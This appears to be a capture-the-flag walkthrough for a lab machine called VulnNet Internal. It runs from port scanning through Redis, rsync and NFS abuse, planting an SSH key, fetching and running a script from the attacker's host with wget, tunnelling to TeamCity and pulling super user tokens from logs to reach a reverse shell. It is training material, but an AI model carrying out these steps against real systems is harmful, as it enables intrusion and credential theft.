nmap
nmap -p- -T5 -sV -vvv 10.10.210.193Output:
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
873/tcp open rsync syn-ack (protocol version 31)
2049/tcp open nfs_acl syn-ack 3 (RPC #100227)
6379/tcp open redis syn-ack Redis key-value store
9090/tcp filtered zeus-admin no-response
44305/tcp open nlockmgr syn-ack 1-4 (RPC #100021)
50597/tcp open mountd syn-ack 1-3 (RPC #100005)
55125/tcp open mountd syn-ack 1-3 (RPC #100005)
58261/tcp open mountd syn-ack 1-3 (RPC #100005)
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernelSMB
smbclient //10.10.210.193/shares -U "guest"
NFS
sudo pacman -S nfs-utils
sudo mount -t nfs 10.10.210.193:/opt/conf /home/peanutstick/Documents/CTF/THM/vulnet_internal/mount
The config files are interesting, we have the service redis.
Let’s grab the password.
B65Hx562F@ggAZ@F
Redis
https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis
nc -vn 10.10.210.193 6379
AUTH B65Hx562F@ggAZ@F
SELECT 0
KEYS *
GET "internal flag"
Get “authlist”:
LRANGE "authlist" 0 -1
Decode the hash:
echo QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg== |base64 -dOutput:
Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72vRsync
List the files:rsync -av --list-only rsync://10.10.210.193
Copy files.rsync -av rsync://rsync-connect@10.10.210.193/files ./files
We have the flag, tree don’t list the uden flags.
https://medium.com/r3d-buck3t/attack-insecure-rsync-service-928951af34ed
There is a .ssh, we can upload a authorized_keys to conncet via ssh.
ssh-keygen -t rsa
Then upload it:
rsync authorized_keys rsync://rsync-connect@10.10.210.193/files/sys-internal/.ssh Connect to ssh:
ssh -i A_rsa sys-internal@10.10.210.193 SSH
lse.sh
Then:
wget http://10.8.50.167:8000/lse.sh
chmod +x *
./lse.sh 
yeah but I don’t have my password
8111
Port forwarding
https://hideandsec.sh/books/cheatsheets-82c/page/pivoting
ssThe port 8111 is open:
ssh -i A_rsa sys-internal@10.10.210.193 -D 8111:127.0.0.1:8111 -Nhttp://127.0.0.1:8111/login.html
Click on “as a Super user” then:
cd /TeamCity/logs
grep --color=auto -rnw '.' -ie "token" --color=always 2> /dev/nullOutput:
./catalina.out:56:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
./catalina.out:57:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
./catalina.out:1402:[TeamCity] Super user authentication token: 3782562599667957776 (use empty username with the token as the password to access the server)
./catalina.out:1457:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
./catalina.out:1526:[TeamCity] Super user authentication token: 6152940187709854289 (use empty username with the token as the password to access the server)
./catalina.out:1583:[TeamCity] Super user authentication token: 6152940187709854289 (use empty username with the token as the password to access the server)
once the command is in the build step, start the listener then click on run.